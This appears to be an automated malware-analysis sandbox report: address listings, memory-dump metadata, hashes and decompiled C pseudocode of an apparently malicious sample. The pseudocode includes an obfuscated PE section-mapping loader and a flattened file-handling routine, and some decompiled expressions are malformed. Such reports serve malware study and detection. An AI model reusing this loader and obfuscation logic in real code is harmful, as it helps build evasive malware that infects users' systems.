                                              0x0022e4ac
                                              0x0022e4b4
                                              0x0022e4c4
                                              0x0022e4c8
                                              0x0022e4d0
                                              0x0022e4d8
                                              0x0022e4e0
                                              0x0022e4e8
                                              0x0022e4f0
                                              0x0022e4f8
                                              0x0022e500
                                              0x0022e505
                                              0x0022e50d
                                              0x0022e515
                                              0x0022e521
                                              0x0022e524
                                              0x0022e528
                                              0x0022e530
                                              0x0022e53b
                                              0x0022e546
                                              0x0022e551
                                              0x0022e559
                                              0x0022e55e
                                              0x0022e563
                                              0x0022e56b
                                              0x0022e573
                                              0x0022e57d
                                              0x0022e582
                                              0x0022e58a
                                              0x0022e592
                                              0x0022e597
                                              0x0022e59f
                                              0x0022e5a7
                                              0x0022e5af
                                              0x0022e5b7
                                              0x0022e5bf
                                              0x0022e5c7
                                              0x0022e5cf
                                              0x0022e5d7
                                              0x0022e5df
                                              0x0022e5e7
                                              0x0022e5ef
                                              0x0022e5f7
                                              0x0022e5ff
                                              0x0022e607
                                              0x0022e60f
                                              0x0022e61e
                                              0x0022e61f
                                              0x0022e629
                                              0x0022e62d
                                              0x0022e635
                                              0x0022e63d
                                              0x0022e645
                                              0x0022e64d
                                              0x0022e655
                                              0x0022e668
                                              0x0022e66f
                                              0x0022e67a
                                              0x0022e682
                                              0x0022e68a
                                              0x0022e68f
                                              0x0022e697
                                              0x0022e69f
                                              0x0022e6a4
                                              0x0022e6ac
                                              0x0022e6bf
                                              0x0022e6c6
                                              0x0022e6d1
                                              0x0022e6dc
                                              0x0022e6e7
                                              0x0022e6f2
                                              0x0022e6fa
                                              0x0022e6ff
                                              0x0022e707
                                              0x0022e712
                                              0x0022e71d
                                              0x0022e728
                                              0x0022e730
                                              0x0022e738
                                              0x0022e73d
                                              0x0022e742
                                              0x0022e74a
                                              0x0022e752
                                              0x0022e75a
                                              0x0022e75f
                                              0x0022e767
                                              0x0022e77a
                                              0x0022e781
                                              0x0022e78c
                                              0x0022e799
                                              0x0022e79d
                                              0x0022e7a5
                                              0x0022e7ad
                                              0x0022e7b5
                                              0x0022e7bd
                                              0x0022e7c5
                                              0x0022e7cd
                                              0x0022e7d5
                                              0x0022e7da
                                              0x0022e7e4
                                              0x0022e7eb
                                              0x0022e7f2
                                              0x0022e7f9
                                              0x0022e7fd
                                              0x0022e805
                                              0x0022e817
                                              0x0022ea0c
                                              0x0022ea13
                                              0x00000000
                                              0x0022ea13
                                              0x0022e823
                                              0x0022e9d2
                                              0x0022e9d3
                                              0x0022e9d9
                                              0x0022e9ea
                                              0x0022e9ed
                                              0x0022e9f4
                                              0x00000000
                                              0x0022e9f4
                                              0x0022e82f
                                              0x0022e9a9
                                              0x0022e9ae
                                              0x0022e9b0
                                              0x0022e9b3
                                              0x0022e9b6
                                              0x0022ea3d
                                              0x0022ea40
                                              0x0022ea49
                                              0x0022ea49
                                              0x0022e9bc
                                              0x00000000
                                              0x0022e9bc
                                              0x0022e83b
                                              0x0022e93e
                                              0x0022e952
                                              0x0022e957
                                              0x0022e959
                                              0x0022e95e
                                              0x0022e963
                                              0x00000000
                                              0x0022e963
                                              0x0022e847
                                              0x0022e925
                                              0x00000000
                                              0x0022e925
                                              0x0022e84f
                                              0x0022ea31
                                              0x0022ea31
                                              0x0022ea37
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0022ea37
                                              0x0022e88c
                                              0x0022e891
                                              0x0022e896
                                              0x0022e8cf
                                              0x0022e8e4
                                              0x0022e8e4
                                              0x0022e8e6
                                              0x0022e91e
                                              0x0022e8e8
                                              0x0022e8ef
                                              0x0022e90c
                                              0x0022e911
                                              0x0022e914
                                              0x0022e914
                                              0x00000000
                                              0x0022e8e6
                                              0x0022e898
                                              0x0022e89a
                                              0x0022e8b9
                                              0x0022e8bd
                                              0x0022e8d8
                                              0x0022e8df
                                              0x0022e8df
                                              0x00000000
                                              0x0022e8df
                                              0x0022e8bf
                                              0x0022e8bf
                                              0x0022e8c5
                                              0x0022e8c6
                                              0x00000000
                                              0x0022e8c6
                                              0x0022ea26
                                              0x0022ea2c
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
                                              • API String ID: 823142352-1348462970
                                              • Opcode ID: 6f7f6e1a65d51a1351a8efa0b65ca5839172cfca3cbd14bacd242c2d434415f7
                                              • Instruction ID: 939b984d0d9c51bdfdf966c50bb545969ff41e3b856e396f273d19ba55577076
                                              • Opcode Fuzzy Hash: 6f7f6e1a65d51a1351a8efa0b65ca5839172cfca3cbd14bacd242c2d434415f7
                                              • Instruction Fuzzy Hash: A4F15071118381AFE768CF65C54AA5BBBF1BBC4708F108A1DF1DA862A0D7B58919DF03
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00236DB9, Relevance: 15.2, Strings: 12, Instructions: 224COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E00236DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t224;
				void* _t243;
				void* _t256;
				void* _t264;
				void* _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				void* _t295;
				void* _t298;
				signed int* _t301;
				signed int* _t302;
				signed int* _t303;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(3);
				_push(__ecx);
				E0022602B(_t224);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x15bbba;
				_v72 = 0x7e44;
				_t290 = 0x3e;
				_v72 = _v72 * 0x56;
				_v72 = _v72 | 0xe97810d5;
				_v72 = _v72 ^ 0xe97a6add;
				_v56 = 0x50ea;
				_v56 = _v56 >> 9;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x00008000;
				_v100 = 0x7422;
				_v100 = _v100 + 0xffff8791;
				_v100 = _v100 ^ 0x724a15f0;
				_v100 = _v100 + 0xd05;
				_v100 = _v100 ^ 0x8db5db48;
				_v48 = 0x2edd;
				_v48 = _v48 / _t290;
				_v48 = _v48 ^ 0x00005532;
				_v76 = 0xee3f;
				_v76 = _v76 + 0xffffe6cd;
				_v76 = _v76 + 0xffff5ce1;
				_v76 = _v76 ^ 0x00006965;
				_v104 = 0xa36d;
				_v104 = _v104 << 0xc;
				_v104 = _v104 + 0x5d19;
				_v104 = _v104 >> 1;
				_v104 = _v104 ^ 0x051bebf0;
				_v52 = 0xa852;
				_v52 = _v52 + 0xddb7;
				_v52 = _v52 ^ 0x00019bba;
				_v96 = 0xa4e6;
				_v96 = _v96 | 0xa6d42a45;
				_t291 = 0x2e;
				_v96 = _v96 * 0x22;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x507e3c16;
				_v40 = 0x2ce2;
				_v40 = _v40 + 0xffffe435;
				_v40 = _v40 ^ 0x00002c9b;
				_v64 = 0xad5e;
				_v64 = _v64 * 0xd;
				_v64 = _v64 >> 0xf;
				_v64 = _v64 ^ 0x00006dfc;
				_v68 = 0x15e2;
				_v68 = _v68 << 4;
				_v68 = _v68 + 0x971e;
				_v68 = _v68 ^ 0x0001ffd3;
				_v28 = 0x5912;
				_v28 = _v28 | 0xb77a8e9e;
				_v28 = _v28 ^ 0xb77a927a;
				_v32 = 0xb0a1;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x000014c1;
				_v36 = 0x1527;
				_v36 = _v36 / _t291;
				_v36 = _v36 ^ 0x000058cb;
				_v92 = 0x32e5;
				_v92 = _v92 * 0x31;
				_v92 = _v92 + 0xffff00ec;
				_v92 = _v92 << 8;
				_v92 = _v92 ^ 0x08be8a0d;
				_v20 = 0xbd6f;
				_v20 = _v20 + 0xab45;
				_v20 = _v20 ^ 0x000148c7;
				_v24 = 0x6d6f;
				_t292 = 0x6d;
				_v24 = _v24 / _t292;
				_v24 = _v24 ^ 0x00002132;
				_v84 = 0xac46;
				_t293 = 0x2f;
				_v84 = _v84 * 0x6c;
				_v84 = _v84 + 0xe89f;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0x0000aacf;
				_v88 = 0x7aeb;
				_v88 = _v88 * 0x1d;
				_v88 = _v88 >> 0xb;
				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00233811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00227EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00232674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00232674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0022F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0022E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00234FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}












































                                              0x00236dbe
                                              0x00236dc5
                                              0x00236dcc
                                              0x00236dd3
                                              0x00236dda
                                              0x00236ddc
                                              0x00236dde
                                              0x00236ddf
                                              0x00236de4
                                              0x00236dee
                                              0x00236df9
                                              0x00236e08
                                              0x00236e0b
                                              0x00236e0f
                                              0x00236e17
                                              0x00236e1f
                                              0x00236e27
                                              0x00236e2c
                                              0x00236e31
                                              0x00236e39
                                              0x00236e41
                                              0x00236e49
                                              0x00236e51
                                              0x00236e59
                                              0x00236e61
                                              0x00236e71
                                              0x00236e75
                                              0x00236e7d
                                              0x00236e85
                                              0x00236e8d
                                              0x00236e95
                                              0x00236e9d
                                              0x00236ea5
                                              0x00236eaa
                                              0x00236eb2
                                              0x00236eb6
                                              0x00236ebe
                                              0x00236ec6
                                              0x00236ece
                                              0x00236ed6
                                              0x00236ede
                                              0x00236eeb
                                              0x00236eec
                                              0x00236ef0
                                              0x00236ef4
                                              0x00236efc
                                              0x00236f04
                                              0x00236f0c
                                              0x00236f14
                                              0x00236f21
                                              0x00236f25
                                              0x00236f2a
                                              0x00236f32
                                              0x00236f3a
                                              0x00236f3f
                                              0x00236f47
                                              0x00236f4f
                                              0x00236f57
                                              0x00236f5f
                                              0x00236f67
                                              0x00236f6f
                                              0x00236f74
                                              0x00236f7c
                                              0x00236f8a
                                              0x00236f8e
                                              0x00236f96
                                              0x00236fa3
                                              0x00236fa7
                                              0x00236fb1
                                              0x00236fb6
                                              0x00236fbe
                                              0x00236fc6
                                              0x00236fce
                                              0x00236fd6
                                              0x00236fe4
                                              0x00236fe9
                                              0x00236fef
                                              0x00236ff7
                                              0x00237004
                                              0x00237007
                                              0x0023700b
                                              0x00237013
                                              0x00237018
                                              0x00237020
                                              0x0023702d
                                              0x00237031
                                              0x0023703c
                                              0x0023703d
                                              0x00237043
                                              0x0023704b
                                              0x00237053
                                              0x00237060
                                              0x00237064
                                              0x0023706c
                                              0x00237077
                                              0x0023707f
                                              0x0023708a
                                              0x00237092
                                              0x0023709a
                                              0x002370a2
                                              0x002370aa
                                              0x002370b5
                                              0x002370b9
                                              0x002370be
                                              0x002370c6
                                              0x002370ce
                                              0x002370d6
                                              0x002370f5
                                              0x002370fa
                                              0x002370fc
                                              0x00237101
                                              0x002371ee
                                              0x002371ee
                                              0x0023712d
                                              0x0023712f
                                              0x00237134
                                              0x002371e7
                                              0x00000000
                                              0x002371e7
                                              0x00237157
                                              0x00237160
                                              0x0023716d
                                              0x0023716f
                                              0x002371aa
                                              0x0023718d
                                              0x0023719f
                                              0x002371a4
                                              0x002371a7
                                              0x002371a7
                                              0x002371b2
                                              0x002371b9
                                              0x002371c4
                                              0x002371c6
                                              0x002371dd
                                              0x002371e5
                                              0x002371e5
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
                                              • API String ID: 0-3377435326
                                              • Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                              • Instruction ID: 4185b0500c50c83eace7189460d15b35b02efa526f6d78083aad28964bbfccae
                                              • Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                              • Instruction Fuzzy Hash: 13B133B25187809FE364CF65C88A90BFBF1BBC4758F50891CF695862A0C7B9C559CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00226D9F, Relevance: 14.1, Strings: 11, Instructions: 340COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E00226D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0023889D(0x23c930, _v1076, __eflags);
								_t368 =  *0x23ca2c; // 0x4d8300
								__eflags = _t368 + 0x230;
								_t419 =  *0x23ca2c; // 0x4d8300
								E002229E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00232025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x23ca2c; // 0x4d8300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0022C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002265A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00230ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00221AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0023889D(0x23c9d0, _v1184, _t440);
													_pop(_t405);
													E00233EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x23c9d0, _v1124, _v1208, 0x23c9d0, _v1164, 0x23c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00232025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}





































































                                              0x00226d9f
                                              0x00226da5
                                              0x00226db2
                                              0x00226dbb
                                              0x00226dc3
                                              0x00226dcb
                                              0x00226dd0
                                              0x00226dd8
                                              0x00226de0
                                              0x00226de5
                                              0x00226ded
                                              0x00226df5
                                              0x00226dfd
                                              0x00226e05
                                              0x00226e0d
                                              0x00226e19
                                              0x00226e20
                                              0x00226e2b
                                              0x00226e30
                                              0x00226e36
                                              0x00226e3e
                                              0x00226e46
                                              0x00226e59
                                              0x00226e5a
                                              0x00226e61
                                              0x00226e6c
                                              0x00226e74
                                              0x00226e79
                                              0x00226e7e
                                              0x00226e86
                                              0x00226e8e
                                              0x00226e96
                                              0x00226e9e
                                              0x00226ea6
                                              0x00226eae
                                              0x00226eb9
                                              0x00226ec4
                                              0x00226ecf
                                              0x00226ed7
                                              0x00226ee1
                                              0x00226ee5
                                              0x00226eed
                                              0x00226ef5
                                              0x00226efa
                                              0x00226f02
                                              0x00226f07
                                              0x00226f0f
                                              0x00226f1a
                                              0x00226f25
                                              0x00226f30
                                              0x00226f38
                                              0x00226f40
                                              0x00226f45
                                              0x00226f4d
                                              0x00226f58
                                              0x00226f63
                                              0x00226f6e
                                              0x00226f79
                                              0x00226f84
                                              0x00226f8f
                                              0x00226fa3
                                              0x00226faa
                                              0x00226fb5
                                              0x00226fbd
                                              0x00226fc5
                                              0x00226fca
                                              0x00226fd2
                                              0x00226fda
                                              0x00226fe4
                                              0x00226ff2
                                              0x00226ff7
                                              0x00226ffd
                                              0x00227005
                                              0x0022700d
                                              0x00227015
                                              0x0022701a
                                              0x00227022
                                              0x0022702a
                                              0x00227032
                                              0x0022703a
                                              0x0022703f
                                              0x00227047
                                              0x0022704f
                                              0x0022705a
                                              0x00227062
                                              0x0022706d
                                              0x00227078
                                              0x00227083
                                              0x0022708e
                                              0x00227096
                                              0x0022709b
                                              0x002270a3
                                              0x002270ab
                                              0x002270b3
                                              0x002270bb
                                              0x002270c3
                                              0x002270cb
                                              0x002270d8
                                              0x002270db
                                              0x002270df
                                              0x002270e4
                                              0x002270ec
                                              0x002270f4
                                              0x002270fc
                                              0x00227104
                                              0x0022710c
                                              0x00227114
                                              0x0022711f
                                              0x00227127
                                              0x00227132
                                              0x0022713a
                                              0x00227142
                                              0x0022714a
                                              0x00227152
                                              0x0022715a
                                              0x0022715f
                                              0x00227167
                                              0x0022716c
                                              0x00227174
                                              0x0022717c
                                              0x00227184
                                              0x00227189
                                              0x00227191
                                              0x002271a7
                                              0x002271ae
                                              0x002271b9
                                              0x002271c1
                                              0x002271c6
                                              0x002271ce
                                              0x002271d6
                                              0x002271e2
                                              0x002271e5
                                              0x002271e9
                                              0x002271ee
                                              0x002271f6
                                              0x002271fe
                                              0x0022720b
                                              0x00227210
                                              0x00227218
                                              0x00227220
                                              0x0022722b
                                              0x00227236
                                              0x00227241
                                              0x00227249
                                              0x0022724e
                                              0x00227253
                                              0x0022725b
                                              0x00227263
                                              0x00227268
                                              0x00227270
                                              0x00227278
                                              0x00227280
                                              0x00227285
                                              0x0022728a
                                              0x00227292
                                              0x00227299
                                              0x002272a1
                                              0x002272a9
                                              0x002272b1
                                              0x002272b9
                                              0x002272c4
                                              0x002272cf
                                              0x002272da
                                              0x002272e2
                                              0x002272e7
                                              0x002272ec
                                              0x002272f4
                                              0x002272fc
                                              0x002272fc
                                              0x002272fe
                                              0x002272ff
                                              0x002272ff
                                              0x002272ff
                                              0x00227304
                                              0x00227304
                                              0x0022730a
                                              0x00227487
                                              0x00227497
                                              0x002274bb
                                              0x002274c0
                                              0x002274d5
                                              0x002274e1
                                              0x002274f7
                                              0x002274fc
                                              0x002274ff
                                              0x00000000
                                              0x00227310
                                              0x00227316
                                              0x00227467
                                              0x0022746d
                                              0x00227478
                                              0x00227478
                                              0x0022747b
                                              0x00000000
                                              0x00000000
                                              0x00227475
                                              0x00227475
                                              0x00227475
                                              0x0022747d
                                              0x00227480
                                              0x00000000
                                              0x0022731c
                                              0x00227322
                                              0x00227433
                                              0x00227434
                                              0x00227455
                                              0x0022745a
                                              0x0022745d
                                              0x00000000
                                              0x00227328
